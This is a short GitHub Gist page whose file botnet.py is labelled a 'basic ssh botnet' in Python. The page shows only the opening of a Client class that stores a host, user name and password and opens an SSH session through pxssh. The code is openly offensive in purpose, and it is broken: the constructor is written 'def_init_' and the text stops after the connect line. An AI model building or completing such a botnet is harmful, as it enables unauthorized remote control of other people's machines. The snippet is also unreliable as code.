Skip to content

Instantly share code, notes, and snippets.

View lava9868's full-sized avatar

Lavanya kaushik lava9868

View GitHub Profile
@lava9868
lava9868 / botnet.py
Created September 11, 2018 13:25
botnet in python
# basic ssh botnet
import pxssh #calling pxssh module
class Client: #defining class with name client
def_init_(self,host,user,password):
self.host = host
self.user=user
self.password = password
self.session = self.connect() # for ssh session